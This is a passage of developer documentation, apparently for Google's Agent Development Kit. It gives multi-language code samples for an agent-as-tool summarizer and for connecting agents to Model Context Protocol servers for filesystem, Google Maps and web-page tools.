create main agent: %v", err) } // 4. Run the main agent prompt := ` Please summarize this text for me: Quantum computing represents a fundamentally different approach to computation, leveraging the bizarre principles of quantum mechanics to process information. Unlike classical computers that rely on bits representing either 0 or 1, quantum computers use qubits which can exist in a state of superposition - effectively being 0, 1, or a combination of both simultaneously. Furthermore, qubits can become entangled, meaning their fates are intertwined regardless of distance, allowing for complex correlations. This parallelism and interconnectedness grant quantum computers the potential to solve specific types of incredibly complex problems - such as drug discovery, materials science, complex system optimization, and breaking certain types of cryptography - far faster than even the most powerful classical supercomputers could ever achieve, although the technology is still largely in its developmental stages. ` fmt.Printf("\nPrompt: %s\nResponse: ", prompt) callAgent(context.Background(), mainAgent, prompt) fmt.Println("\n---") } ``` ```java import com.google.adk.agents.LlmAgent; import com.google.adk.events.Event; import com.google.adk.runner.InMemoryRunner; import com.google.adk.sessions.Session; import com.google.adk.tools.AgentTool; import com.google.genai.types.Content; import com.google.genai.types.Part; import io.reactivex.rxjava3.core.Flowable; public class AgentToolCustomization { private static final String APP_NAME = "summary_agent"; private static final String USER_ID = "user1234"; public static void initAgentAndRun(String prompt) { LlmAgent summaryAgent = LlmAgent.builder() .model("gemini-2.0-flash") .name("summaryAgent") .instruction( "You are an expert summarizer. Please read the following text and provide a concise summary.") .description("Agent to summarize text") .build(); // Define root_agent LlmAgent rootAgent = LlmAgent.builder() .model("gemini-2.0-flash") .name("rootAgent") .instruction( "You are a helpful assistant. When the user provides a text, always use the 'summaryAgent' tool to generate a summary. Always forward the user's message exactly as received to the 'summaryAgent' tool, without modifying or summarizing it yourself. Present the response from the tool to the user.") .description("Assistant agent") .tools(AgentTool.create(summaryAgent, true)) // Set skipSummarization to true .build(); // Create an InMemoryRunner InMemoryRunner runner = new InMemoryRunner(rootAgent, APP_NAME); // InMemoryRunner automatically creates a session service. Create a session using the service Session session = runner.sessionService().createSession(APP_NAME, USER_ID).blockingGet(); Content userMessage = Content.fromParts(Part.fromText(prompt)); // Run the agent Flowable eventStream = runner.runAsync(USER_ID, session.id(), userMessage); // Stream event response eventStream.blockingForEach( event -> { if (event.finalResponse()) { System.out.println(event.stringifyContent()); } }); } public static void main(String[] args) { String longText = """ Quantum computing represents a fundamentally different approach to computation, leveraging the bizarre principles of quantum mechanics to process information. Unlike classical computers that rely on bits representing either 0 or 1, quantum computers use qubits which can exist in a state of superposition - effectively being 0, 1, or a combination of both simultaneously. Furthermore, qubits can become entangled, meaning their fates are intertwined regardless of distance, allowing for complex correlations. This parallelism and interconnectedness grant quantum computers the potential to solve specific types of incredibly complex problems - such as drug discovery, materials science, complex system optimization, and breaking certain types of cryptography - far faster than even the most powerful classical supercomputers could ever achieve, although the technology is still largely in its developmental stages."""; initAgentAndRun(longText); } } ``` ### How it works 1. When the `main_agent` receives the long text, its instruction tells it to use the 'summarize' tool for long texts. 1. The framework recognizes 'summarize' as an `AgentTool` that wraps the `summary_agent`. 1. Behind the scenes, the `main_agent` will call the `summary_agent` with the long text as input. 1. The `summary_agent` will process the text according to its instruction and generate a summary. 1. **The response from the `summary_agent` is then passed back to the `main_agent`.** 1. The `main_agent` can then take the summary and formulate its final response to the user (e.g., "Here's a summary of the text: ...") # Model Context Protocol Tools Supported in ADKPython v0.1.0Typescript v0.2.0Go v0.1.0Java v0.1.0 This guide walks you through two ways of integrating Model Context Protocol (MCP) with ADK. MCP tools for ADK For a list of pre-built MCP tools for ADK, see [Tools and Integrations](/adk-docs/integrations/?topic=mcp). ## What is Model Context Protocol (MCP)? The Model Context Protocol (MCP) is an open standard designed to standardize how Large Language Models (LLMs) like Gemini and Claude communicate with external applications, data sources, and tools. Think of it as a universal connection mechanism that simplifies how LLMs obtain context, execute actions, and interact with various systems. MCP follows a client-server architecture, defining how **data** (resources), **interactive templates** (prompts), and **actionable functions** (tools) are exposed by an **MCP server** and consumed by an **MCP client** (which could be an LLM host application or an AI agent). This guide covers two primary integration patterns: 1. **Using Existing MCP Servers within ADK:** An ADK agent acts as an MCP client, leveraging tools provided by external MCP servers. 1. **Exposing ADK Tools via an MCP Server:** Building an MCP server that wraps ADK tools, making them accessible to any MCP client. ## Prerequisites Before you begin, ensure you have the following set up: - **Set up ADK:** Follow the standard ADK [setup instructions](https://google.github.io/adk-docs/get-started/index.md) in the quickstart. - **Install/update Python/Java:** MCP requires Python version of 3.9 or higher for Python or Java 17 or higher. - **Setup Node.js and npx:** **(Python only)** Many community MCP servers are distributed as Node.js packages and run using `npx`. Install Node.js (which includes npx) if you haven't already. For details, see . - **Verify Installations:** **(Python only)** Confirm `adk` and `npx` are in your PATH within the activated virtual environment: ```shell # Both commands should print the path to the executables. which adk which npx ``` ## 1. Using MCP servers with ADK agents (ADK as an MCP client) in `adk web` This section demonstrates how to integrate tools from external MCP (Model Context Protocol) servers into your ADK agents. This is the **most common** integration pattern when your ADK agent needs to use capabilities provided by an existing service that exposes an MCP interface. You will see how the `McpToolset` class can be directly added to your agent's `tools` list, enabling seamless connection to an MCP server, discovery of its tools, and making them available for your agent to use. These examples primarily focus on interactions within the `adk web` development environment. ### `McpToolset` class The `McpToolset` class is ADK's primary mechanism for integrating tools from an MCP server. When you include an `McpToolset` instance in your agent's `tools` list, it automatically handles the interaction with the specified MCP server. Here's how it works: 1. **Connection Management:** On initialization, `McpToolset` establishes and manages the connection to the MCP server. This can be a local server process (using `StdioConnectionParams` for communication over standard input/output) or a remote server (using `SseConnectionParams` for Server-Sent Events). The toolset also handles the graceful shutdown of this connection when the agent or application terminates. 1. **Tool Discovery & Adaptation:** Once connected, `McpToolset` queries the MCP server for its available tools (via the `list_tools` MCP method). It then converts the schemas of these discovered MCP tools into ADK-compatible `BaseTool` instances. 1. **Exposure to Agent:** These adapted tools are then made available to your `LlmAgent` as if they were native ADK tools. 1. **Proxying Tool Calls:** When your `LlmAgent` decides to use one of these tools, `McpToolset` transparently proxies the call (using the `call_tool` MCP method) to the MCP server, sends the necessary arguments, and returns the server's response back to the agent. 1. **Filtering (Optional):** You can use the `tool_filter` parameter when creating an `McpToolset` to select a specific subset of tools from the MCP server, rather than exposing all of them to your agent. The following examples demonstrate how to use `McpToolset` within the `adk web` development environment. For scenarios where you need more fine-grained control over the MCP connection lifecycle or are not using `adk web`, refer to the "Using MCP Tools in your own Agent out of `adk web`" section later in this page. ### Example 1: File System MCP Server This Python example demonstrates connecting to a local MCP server that provides file system operations. #### Step 1: Define your Agent with `McpToolset` Create an `agent.py` file (e.g., in `./adk_agent_samples/mcp_agent/agent.py`). The `McpToolset` is instantiated directly within the `tools` list of your `LlmAgent`. - **Important:** Replace `"/path/to/your/folder"` in the `args` list with the **absolute path** to an actual folder on your local system that the MCP server can access. - **Important:** Place the `.env` file in the parent directory of the `./adk_agent_samples` directory. ```python # ./adk_agent_samples/mcp_agent/agent.py import os # Required for path operations from google.adk.agents import LlmAgent from google.adk.tools.mcp_tool import McpToolset from google.adk.tools.mcp_tool.mcp_session_manager import StdioConnectionParams from mcp import StdioServerParameters # It's good practice to define paths dynamically if possible, # or ensure the user understands the need for an ABSOLUTE path. # For this example, we'll construct a path relative to this file, # assuming '/path/to/your/folder' is in the same directory as agent.py. # REPLACE THIS with an actual absolute path if needed for your setup. TARGET_FOLDER_PATH = os.path.join(os.path.dirname(os.path.abspath(__file__)), "/path/to/your/folder") # Ensure TARGET_FOLDER_PATH is an absolute path for the MCP server. # If you created ./adk_agent_samples/mcp_agent/your_folder, root_agent = LlmAgent( model='gemini-2.0-flash', name='filesystem_assistant_agent', instruction='Help the user manage their files. You can list files, read files, etc.', tools=[ McpToolset( connection_params=StdioConnectionParams( server_params = StdioServerParameters( command='npx', args=[ "-y", # Argument for npx to auto-confirm install "@modelcontextprotocol/server-filesystem", # IMPORTANT: This MUST be an ABSOLUTE path to a folder the # npx process can access. # Replace with a valid absolute path on your system. # For example: "/Users/youruser/accessible_mcp_files" # or use a dynamically constructed absolute path: os.path.abspath(TARGET_FOLDER_PATH), ], ), ), # Optional: Filter which tools from the MCP server are exposed # tool_filter=['list_directory', 'read_file'] ) ], ) ``` #### Step 2: Create an `__init__.py` file Ensure you have an `__init__.py` in the same directory as `agent.py` to make it a discoverable Python package for ADK. ```python # ./adk_agent_samples/mcp_agent/__init__.py from . import agent ``` #### Step 3: Run `adk web` and Interact Navigate to the parent directory of `mcp_agent` (e.g., `adk_agent_samples`) in your terminal and run: ```shell cd ./adk_agent_samples # Or your equivalent parent directory adk web ``` Note for Windows users When hitting the `_make_subprocess_transport NotImplementedError`, consider using `adk web --no-reload` instead. Once the ADK Web UI loads in your browser: 1. Select the `filesystem_assistant_agent` from the agent dropdown. 1. Try prompts like: - "List files in the current directory." - "Can you read the file named sample.txt?" (assuming you created it in `TARGET_FOLDER_PATH`). - "What is the content of `another_file.md`?" You should see the agent interacting with the MCP file system server, and the server's responses (file listings, file content) relayed through the agent. The `adk web` console (terminal where you ran the command) might also show logs from the `npx` process if it outputs to stderr. For Java, refer to the following sample to define an agent that initializes the `McpToolset`: ```java package agents; import com.google.adk.JsonBaseModel; import com.google.adk.agents.LlmAgent; import com.google.adk.agents.RunConfig; import com.google.adk.runner.InMemoryRunner; import com.google.adk.tools.mcp.McpTool; import com.google.adk.tools.mcp.McpToolset; import com.google.adk.tools.mcp.McpToolset.McpToolsAndToolsetResult; import com.google.genai.types.Content; import com.google.genai.types.Part; import io.modelcontextprotocol.client.transport.ServerParameters; import java.util.List; import java.util.concurrent.CompletableFuture; public class McpAgentCreator { /** * Initializes an McpToolset, retrieves tools from an MCP server using stdio, * creates an LlmAgent with these tools, sends a prompt to the agent, * and ensures the toolset is closed. * @param args Command line arguments (not used). */ public static void main(String[] args) { //Note: you may have permissions issues if the folder is outside home String yourFolderPath = "~/path/to/folder"; ServerParameters connectionParams = ServerParameters.builder("npx") .args(List.of( "-y", "@modelcontextprotocol/server-filesystem", yourFolderPath )) .build(); try { CompletableFuture futureResult = McpToolset.fromServer(connectionParams, JsonBaseModel.getMapper()); McpToolsAndToolsetResult result = futureResult.join(); try (McpToolset toolset = result.getToolset()) { List tools = result.getTools(); LlmAgent agent = LlmAgent.builder() .model("gemini-2.0-flash") .name("enterprise_assistant") .description("An agent to help users access their file systems") .instruction( "Help user accessing their file systems. You can list files in a directory." ) .tools(tools) .build(); System.out.println("Agent created: " + agent.name()); InMemoryRunner runner = new InMemoryRunner(agent); String userId = "user123"; String sessionId = "1234"; String promptText = "Which files are in this directory - " + yourFolderPath + "?"; // Explicitly create the session first try { // appName for InMemoryRunner defaults to agent.name() if not specified in constructor runner.sessionService().createSession(runner.appName(), userId, null, sessionId).blockingGet(); System.out.println("Session created: " + sessionId + " for user: " + userId); } catch (Exception sessionCreationException) { System.err.println("Failed to create session: " + sessionCreationException.getMessage()); sessionCreationException.printStackTrace(); return; } Content promptContent = Content.fromParts(Part.fromText(promptText)); System.out.println("\nSending prompt: \"" + promptText + "\" to agent...\n"); runner.runAsync(userId, sessionId, promptContent, RunConfig.builder().build()) .blockingForEach(event -> { System.out.println("Event received: " + event.toJson()); }); } } catch (Exception e) { System.err.println("An error occurred: " + e.getMessage()); e.printStackTrace(); } } } ``` Assuming a folder containing three files named `first`, `second` and `third`, successful response will look like this: ```shell Event received: {"id":"163a449e-691a-48a2-9e38-8cadb6d1f136","invocationId":"e-c2458c56-e57a-45b2-97de-ae7292e505ef","author":"enterprise_assistant","content":{"parts":[{"functionCall":{"id":"adk-388b4ac2-d40e-4f6a-bda6-f051110c6498","args":{"path":"~/home-test"},"name":"list_directory"}}],"role":"model"},"actions":{"stateDelta":{},"artifactDelta":{},"requestedAuthConfigs":{}},"timestamp":1747377543788} Event received: {"id":"8728380b-bfad-4d14-8421-fa98d09364f1","invocationId":"e-c2458c56-e57a-45b2-97de-ae7292e505ef","author":"enterprise_assistant","content":{"parts":[{"functionResponse":{"id":"adk-388b4ac2-d40e-4f6a-bda6-f051110c6498","name":"list_directory","response":{"text_output":[{"text":"[FILE] first\n[FILE] second\n[FILE] third"}]}}}],"role":"user"},"actions":{"stateDelta":{},"artifactDelta":{},"requestedAuthConfigs":{}},"timestamp":1747377544679} Event received: {"id":"8fe7e594-3e47-4254-8b57-9106ad8463cb","invocationId":"e-c2458c56-e57a-45b2-97de-ae7292e505ef","author":"enterprise_assistant","content":{"parts":[{"text":"There are three files in the directory: first, second, and third."}],"role":"model"},"actions":{"stateDelta":{},"artifactDelta":{},"requestedAuthConfigs":{}},"timestamp":1747377544689} ``` For Typescript, you can define an agent that initializes the `MCPToolset` as follows: ```typescript import 'dotenv/config'; import {LlmAgent, MCPToolset} from "@google/adk"; // REPLACE THIS with an actual absolute path for your setup. const TARGET_FOLDER_PATH = "/path/to/your/folder"; export const rootAgent = new LlmAgent({ model: "gemini-2.5-flash", name: "filesystem_assistant_agent", instruction: "Help the user manage their files. You can list files, read files, etc.", tools: [ // To filter tools, pass a list of tool names as the second argument // to the MCPToolset constructor. // e.g., new MCPToolset(connectionParams, ['list_directory', 'read_file']) new MCPToolset( { type: "StdioConnectionParams", serverParams: { command: "npx", args: [ "-y", "@modelcontextprotocol/server-filesystem", // IMPORTANT: This MUST be an ABSOLUTE path to a folder the // npx process can access. // Replace with a valid absolute path on your system. // For example: "/Users/youruser/accessible_mcp_files" TARGET_FOLDER_PATH, ], }, } ) ], }); ``` ### Example 2: Google Maps MCP Server This example demonstrates connecting to the Google Maps MCP server. #### Step 1: Get API Key and Enable APIs 1. **Google Maps API Key:** Follow the directions at [Use API keys](https://developers.google.com/maps/documentation/javascript/get-api-key#create-api-keys) to obtain a Google Maps API Key. 1. **Enable APIs:** In your Google Cloud project, ensure the following APIs are enabled: - Directions API - Routes API For instructions, see the [Getting started with Google Maps Platform](https://developers.google.com/maps/get-started#enable-api-sdk) documentation. #### Step 2: Define your Agent with `McpToolset` for Google Maps Modify your `agent.py` file (e.g., in `./adk_agent_samples/mcp_agent/agent.py`). Replace `YOUR_GOOGLE_MAPS_API_KEY` with the actual API key you obtained. ```python # ./adk_agent_samples/mcp_agent/agent.py import os from google.adk.agents import LlmAgent from google.adk.tools.mcp_tool import McpToolset from google.adk.tools.mcp_tool.mcp_session_manager import StdioConnectionParams from mcp import StdioServerParameters # Retrieve the API key from an environment variable or directly insert it. # Using an environment variable is generally safer. # Ensure this environment variable is set in the terminal where you run 'adk web'. # Example: export GOOGLE_MAPS_API_KEY="YOUR_ACTUAL_KEY" google_maps_api_key = os.environ.get("GOOGLE_MAPS_API_KEY") if not google_maps_api_key: # Fallback or direct assignment for testing - NOT RECOMMENDED FOR PRODUCTION google_maps_api_key = "YOUR_GOOGLE_MAPS_API_KEY_HERE" # Replace if not using env var if google_maps_api_key == "YOUR_GOOGLE_MAPS_API_KEY_HERE": print("WARNING: GOOGLE_MAPS_API_KEY is not set. Please set it as an environment variable or in the script.") # You might want to raise an error or exit if the key is crucial and not found. root_agent = LlmAgent( model='gemini-2.0-flash', name='maps_assistant_agent', instruction='Help the user with mapping, directions, and finding places using Google Maps tools.', tools=[ McpToolset( connection_params=StdioConnectionParams( server_params = StdioServerParameters( command='npx', args=[ "-y", "@modelcontextprotocol/server-google-maps", ], # Pass the API key as an environment variable to the npx process # This is how the MCP server for Google Maps expects the key. env={ "GOOGLE_MAPS_API_KEY": google_maps_api_key } ), ), # You can filter for specific Maps tools if needed: # tool_filter=['get_directions', 'find_place_by_id'] ) ], ) ``` #### Step 3: Ensure `__init__.py` Exists If you created this in Example 1, you can skip this. Otherwise, ensure you have an `__init__.py` in the `./adk_agent_samples/mcp_agent/` directory: ```python # ./adk_agent_samples/mcp_agent/__init__.py from . import agent ``` #### Step 4: Run `adk web` and Interact 1. **Set Environment Variable (Recommended):** Before running `adk web`, it's best to set your Google Maps API key as an environment variable in your terminal: ```shell export GOOGLE_MAPS_API_KEY="YOUR_ACTUAL_GOOGLE_MAPS_API_KEY" ``` Replace `YOUR_ACTUAL_GOOGLE_MAPS_API_KEY` with your key. 1. **Run `adk web`**: Navigate to the parent directory of `mcp_agent` (e.g., `adk_agent_samples`) and run: ```shell cd ./adk_agent_samples # Or your equivalent parent directory adk web ``` 1. **Interact in the UI**: - Select the `maps_assistant_agent`. - Try prompts like: - "Get directions from GooglePlex to SFO." - "Find coffee shops near Golden Gate Park." - "What's the route from Paris, France to Berlin, Germany?" You should see the agent use the Google Maps MCP tools to provide directions or location-based information. For Java, refer to the following sample to define an agent that initializes the `McpToolset`: ```java package agents; import com.google.adk.JsonBaseModel; import com.google.adk.agents.LlmAgent; import com.google.adk.agents.RunConfig; import com.google.adk.runner.InMemoryRunner; import com.google.adk.tools.mcp.McpTool; import com.google.adk.tools.mcp.McpToolset; import com.google.adk.tools.mcp.McpToolset.McpToolsAndToolsetResult; import com.google.genai.types.Content; import com.google.genai.types.Part; import io.modelcontextprotocol.client.transport.ServerParameters; import java.util.List; import java.util.Map; import java.util.Collections; import java.util.HashMap; import java.util.concurrent.CompletableFuture; import java.util.Arrays; public class MapsAgentCreator { /** * Initializes an McpToolset for Google Maps, retrieves tools, * creates an LlmAgent, sends a map-related prompt, and closes the toolset. * @param args Command line arguments (not used). */ public static void main(String[] args) { // TODO: Replace with your actual Google Maps API key, on a project with the Places API enabled. String googleMapsApiKey = "YOUR_GOOGLE_MAPS_API_KEY"; Map envVariables = new HashMap<>(); envVariables.put("GOOGLE_MAPS_API_KEY", googleMapsApiKey); ServerParameters connectionParams = ServerParameters.builder("npx") .args(List.of( "-y", "@modelcontextprotocol/server-google-maps" )) .env(Collections.unmodifiableMap(envVariables)) .build(); try { CompletableFuture futureResult = McpToolset.fromServer(connectionParams, JsonBaseModel.getMapper()); McpToolsAndToolsetResult result = futureResult.join(); try (McpToolset toolset = result.getToolset()) { List tools = result.getTools(); LlmAgent agent = LlmAgent.builder() .model("gemini-2.0-flash") .name("maps_assistant") .description("Maps assistant") .instruction("Help user with mapping and directions using available tools.") .tools(tools) .build(); System.out.println("Agent created: " + agent.name()); InMemoryRunner runner = new InMemoryRunner(agent); String userId = "maps-user-" + System.currentTimeMillis(); String sessionId = "maps-session-" + System.currentTimeMillis(); String promptText = "Please give me directions to the nearest pharmacy to Madison Square Garden."; try { runner.sessionService().createSession(runner.appName(), userId, null, sessionId).blockingGet(); System.out.println("Session created: " + sessionId + " for user: " + userId); } catch (Exception sessionCreationException) { System.err.println("Failed to create session: " + sessionCreationException.getMessage()); sessionCreationException.printStackTrace(); return; } Content promptContent = Content.fromParts(Part.fromText(promptText)) System.out.println("\nSending prompt: \"" + promptText + "\" to agent...\n"); runner.runAsync(userId, sessionId, promptContent, RunConfig.builder().build()) .blockingForEach(event -> { System.out.println("Event received: " + event.toJson()); }); } } catch (Exception e) { System.err.println("An error occurred: " + e.getMessage()); e.printStackTrace(); } } } ``` A successful response will look like this: ```shell Event received: {"id":"1a4deb46-c496-4158-bd41-72702c773368","invocationId":"e-48994aa0-531c-47be-8c57-65215c3e0319","author":"maps_assistant","content":{"parts":[{"text":"OK. I see a few options. The closest one is CVS Pharmacy at 5 Pennsylvania Plaza, New York, NY 10001, United States. Would you like directions?\n"}],"role":"model"},"actions":{"stateDelta":{},"artifactDelta":{},"requestedAuthConfigs":{}},"timestamp":1747380026642} ``` For TypeScript, refer to the following sample to define an agent that initializes the `MCPToolset`: ```typescript import 'dotenv/config'; import {LlmAgent, MCPToolset} from "@google/adk"; // Retrieve the API key from an environment variable. // Ensure this environment variable is set in the terminal where you run 'adk web'. // Example: export GOOGLE_MAPS_API_KEY="YOUR_ACTUAL_KEY" const googleMapsApiKey = process.env.GOOGLE_MAPS_API_KEY; if (!googleMapsApiKey) { throw new Error('GOOGLE_MAPS_API_KEY is not provided, please run "export GOOGLE_MAPS_API_KEY=YOUR_ACTUAL_KEY" to add that.'); } export const rootAgent = new LlmAgent({ model: "gemini-2.5-flash", name: "maps_assistant_agent", instruction: "Help the user with mapping, directions, and finding places using Google Maps tools.", tools: [ new MCPToolset( { type: "StdioConnectionParams", serverParams: { command: "npx", args: [ "-y", "@modelcontextprotocol/server-google-maps", ], // Pass the API key as an environment variable to the npx process // This is how the MCP server for Google Maps expects the key. env: { "GOOGLE_MAPS_API_KEY": googleMapsApiKey } }, }, // You can filter for specific Maps tools if needed: // ['get_directions', 'find_place_by_id'] ) ], }); ``` A successful response will look like this: ```shell Event received: {"id":"1a4deb46-c496-4158-bd41-72702c773368","invocationId":"e-48994aa0-531c-47be-8c57-65215c3e0319","author":"maps_assistant","content":{"parts":[{"text":"OK. I see a few options. The closest one is CVS Pharmacy at 5 Pennsylvania Plaza, New York, NY 10001, United States. Would you like directions?\n"}],"role":"model"},"actions":{"stateDelta":{},"artifactDelta":{},"requestedAuthConfigs":{}},"timestamp":1747380026642} ``` ## 2. Building an MCP server with ADK tools (MCP server exposing ADK) This pattern allows you to wrap existing ADK tools and make them available to any standard MCP client application. The example in this section exposes the ADK `load_web_page` tool through a custom-built MCP server. ### Summary of steps You will create a standard Python MCP server application using the `mcp` library. Within this server, you will: 1. Instantiate the ADK tool(s) you want to expose (e.g., `FunctionTool(load_web_page)`). 1. Implement the MCP server's `@app.list_tools()` handler to advertise the ADK tool(s). This involves converting the ADK tool definition to the MCP schema using the `adk_to_mcp_tool_type` utility from `google.adk.tools.mcp_tool.conversion_utils`. 1. Implement the MCP server's `@app.call_tool()` handler. This handler will: - Receive tool call requests from MCP clients. - Identify if the request targets one of your wrapped ADK tools. - Execute the ADK tool's `.run_async()` method. - Format the ADK tool's result into an MCP-compliant response (e.g., `mcp.types.TextContent`). ### Prerequisites Install the MCP server library in the same Python environment as your ADK installation: ```shell pip install mcp ``` ### Step 1: Create the MCP Server Script Create a new Python file for your MCP server, for example, `my_adk_mcp_server.py`. ### Step 2: Implement the Server Logic Add the following code to `my_adk_mcp_server.py`. This script sets up an MCP server that exposes the ADK `load_web_page` tool. ```python # my_adk_mcp_server.py import asyncio import json import os from dotenv import load_dotenv # MCP Server Imports from mcp import types as mcp_types # Use alias to avoid conflict from mcp.server.lowlevel import Server, NotificationOptions from mcp.server.models import InitializationOptions import mcp.server.stdio # For running as a stdio server # ADK Tool Imports from google.adk.tools.function_tool import FunctionTool from google.adk.tools.load_web_page import load_web_page # Example ADK tool # ADK <-> MCP Conversion Utility from google.adk.tools.mcp_tool.conversion_utils import adk_to_mcp_tool_type # --- Load Environment Variables (If ADK tools need them, e.g., API keys) --- load_dotenv() # Create a .env file in the same directory if needed # --- Prepare the ADK Tool --- # Instantiate the ADK tool you want to expose. # This tool will be wrapped and called by the MCP server. print("Initializing ADK load_web_page tool...") adk_tool_to_expose = FunctionTool(load_web_page) print(f"ADK tool '{adk_tool_to_expose.name}' initialized and ready to be exposed via MCP.") # --- End ADK Tool Prep --- # --- MCP Server Setup --- print("Creating MCP Server instance...") # Create a named MCP Server instance using the mcp.server library app = Server("adk-tool-exposing-mcp-server") # Implement the MCP server's handler to list available tools @app.list_tools() async def list_mcp_tools() -> list[mcp_types.Tool]: """MCP handler to list tools this server exposes.""" print("MCP Server: Received list_tools request.") # Convert the ADK tool's definition to the MCP Tool schema format mcp_tool_schema = adk_to_mcp_tool_type(adk_tool_to_expose) print(f"MCP Server: Advertising tool: {mcp_tool_schema.name}") return [mcp_tool_schema] # Implement the MCP server's handler to execute a tool call @app.call_tool() async def call_mcp_tool( name: str, arguments: dict ) -> list[mcp_types.Content]: # MCP uses mcp_types.Content """MCP handler to execute a tool call requested by an MCP client.""" print(f"MCP Server: Received call_tool request for '{name}' with args: {arguments}") # Check if the requested tool name matches our wrapped ADK tool if name == adk_tool_to_expose.name: try: # Execute the ADK tool's run_async method. # Note: tool_context is None here because this MCP server is # running the ADK tool outside of a full ADK Runner invocation. # If the ADK tool requires ToolContext features (like state or auth), # this direct invocation might need more sophisticated handling. adk_tool_response = await adk_tool_to_expose.run_async( args=arguments, tool_context=None, ) print(f"MCP Server: ADK tool '{name}' executed. Response: {adk_tool_response}") # Format the ADK tool's response (often a dict) into an MCP-compliant format. # Here, we serialize the response dictionary as a JSON string within TextContent. # Adjust formatting based on the ADK tool's output and client needs. response_text = json.dumps(adk_tool_response, indent=2) # MCP expects a list of mcp_types.Content parts return [mcp_types.TextContent(type="text", text=response_text)] except Exception as e: print(f"MCP Server: Error executing ADK tool '{name}': {e}") # Return an error message in MCP format error_text = json.dumps({"error": f"Failed to execute tool '{name}': {str(e)}"}) return [mcp_types.TextContent(type="text", text=error_text)] else: # Handle calls to unknown tools print(f"MCP Server: Tool '{name}' not found/exposed by this server.") error_text = json.dumps({"error": f"Tool '{name}' not implemented by this server."}) return [mcp_types.TextContent(type="text", text=error_text)] # --- MCP Server Runner --- async def run_mcp_stdio_server(): """Runs the MCP server, listening for connections over standard input/output.""" # Use the stdio_server context manager from the mcp.server.stdio library async with mcp.server.stdio.stdio_server() as (read_stream, write_stream): print("MCP Stdio Server: Starting handshake with client...") await app.run( read_stream, write_stream, InitializationOptions( server_name=app.name, # Use the server name defined above server_version="0.1.0", capabilities=app.get_capabilities( # Define server capabilities - consult MCP docs for options notification_options=NotificationOptions(), experimental_capabilities={}, ), ), ) print("MCP Stdio Server: Run loop finished or client disconnected.") if __name__ == "__main__": print("Launching MCP Server to expose ADK tools via stdio...") try: asyncio.run(run_mcp_stdio_server()) except KeyboardInterrupt: print("\nMCP Server (stdio) stopped by user.") except Exception as e: print(f"MCP Server (stdio) encountered an error: {e}") finally: print("MCP Server (stdio) process exiting.") # --- End MCP Server --- ``` ### Step 3: Test your Custom MCP Server with an ADK Agent Now, create an ADK agent that will act as a client to the MCP server you just built. This ADK agent will use `McpToolset` to connect to your `my_adk_mcp_server.py` script. Create an `agent.py` (e.g., in `./adk_agent_samples/mcp_client_agent/agent.py`): ```python # ./adk_agent_samples/mcp_client_agent/agent.py import os from google.adk.agents import LlmAgent from google.adk.tools.mcp_tool import McpToolset from google.adk.tools.mcp_tool.mcp_session_manager import StdioConnectionParams from mcp import StdioServerParameters # IMPORTANT: Replace this with the ABSOLUTE path to your my_adk_mcp_server.py script PATH_TO_YOUR_MCP_SERVER_SCRIPT = "/path/to/your/my_adk_mcp_server.py" # <<< REPLACE if PATH_TO_YOUR_MCP_SERVER_SCRIPT == "/path/to/your/my_adk_mcp_server.py": print("WARNING: PATH_TO_YOUR_MCP_SERVER_SCRIPT is not set. Please update it in agent.py.") # Optionally, raise an error if the path is critical root_agent = LlmAgent( model='gemini-2.0-flash', name='web_reader_mcp_client_agent', instruction="Use the 'load_web_page' tool to fetch content from a URL provided by the user.", tools=[ McpToolset( connection_params=StdioConnectionParams( server_params = StdioServerParameters( command='python3', # Command to run your MCP server script args=[PATH_TO_YOUR_MCP_SERVER_SCRIPT], # Argument is the path to the script ) ) # tool_filter=['load_web_page'] # Optional: ensure only specific tools are loaded ) ], ) ``` And an `__init__.py` in the same directory: ```python # ./adk_agent_samples/mcp_client_agent/__init__.py from . import agent ``` **To run the test:** 1. **Start your custom MCP server (optional, for separate observation):** You can run your `my_adk_mcp_server.py` directly in one terminal to see its logs: ```shell python3 /path/to/your/my_adk_mcp_server.py ``` It will print "Launching MCP Server..." and wait. The ADK agent (run via `adk web`) will then connect to this process if the `command` in `StdioConnectionParams` is set up to execute it. *(Alternatively, `McpToolset` will start this server script as a subprocess automatically when the agent initializes).* 1. **Run `adk web` for the client agent:** Navigate to the parent directory of `mcp_client_agent` (e.g., `adk_agent_samples`) and run: ```shell cd ./adk_agent_samples # Or your equivalent parent directory adk web ``` 1. **Interact in the ADK Web UI:** - Select the `web_reader_mcp_client_agent`. - Try a prompt like: "Load the content from https://example.com" The ADK agent (`web_reader_mcp_client_agent`) will use `McpToolset` to start and connect to your `my_adk_mcp_server.py`. Your MCP server will receive the `call_tool` request, execute the ADK `load_web_page` tool, and return the result. The ADK agent will then relay this information. You should see logs from both the ADK Web UI (and its terminal) and potentially from your `my_adk_mcp_server.py` terminal if you ran it separately. This example demonstrates how ADK tools can be encapsulated within an MCP server, making them accessible to a broader range of MCP-compliant clients, not just ADK agents. Refer to the [documentation](https://modelcontextprotocol.io/quickstart/server#core-mcp-concepts), to try it out with Claude Desktop. ## Using MCP Tools in your own Agent out of `adk web` This section is relevant to you if: - You are developing your own Agent using ADK - And, you are **NOT** using `adk web`, - And, you are exposing the agent via your own UI Using MCP Tools requires a different setup than using regular tools, due to the fact that specs for MCP Tools are fetched asynchronously from the MCP Server running remotely, or in another process. The following example is modified from the "Example 1: File System MCP Server" example above. The main differences are: 1. Your tool and agent are created asynchronously 1. You need to properly manage the exit stack, so that your agents and tools are destructed properly when the connection to MCP Server is closed. ```python # agent.py (modify get_tools_async and other parts as needed) # ./adk_agent_samples/mcp_agent/agent.py import os import asyncio from dotenv import load_dotenv from google.genai import types from google.adk.agents.llm_agent import LlmAgent from google.adk.runners import Runner from google.adk.sessions import InMemorySessionService from google.adk.artifacts.in_memory_artifact_service import InMemoryArtifactService # Optional from google.adk.tools.mcp_tool import McpToolset from google.adk.tools.mcp_tool.mcp_session_manager import StdioConnectionParams from mcp import StdioServerParameters # Load environment variables from .env file in the parent directory # Place this near the top, before using env vars like API keys load_dotenv('../.env') # Ensure TARGET_FOLDER_PATH is an absolute path for the MCP server. TARGET_FOLDER_PATH = os.path.join(os.path.dirname(os.path.abspath(__file__)), "/path/to/your/folder") # --- Step 1: Agent Definition --- async def get_agent_async(): """Creates an ADK Agent equipped with tools from the MCP Server.""" toolset = McpToolset( # Use StdioConnectionParams for local process communication connection_params=StdioConnectionParams( server_params = StdioServerParameters( command='npx', # Command to run the server args=["-y", # Arguments for the command "@modelcontextprotocol/server-filesystem", TARGET_FOLDER_PATH], ), ), tool_filter=['read_file', 'list_directory'] # Optional: filter specific tools # For remote servers, you would use SseConnectionParams instead: # connection_params=SseConnectionParams(url="http://remote-server:port/path", headers={...}) ) # 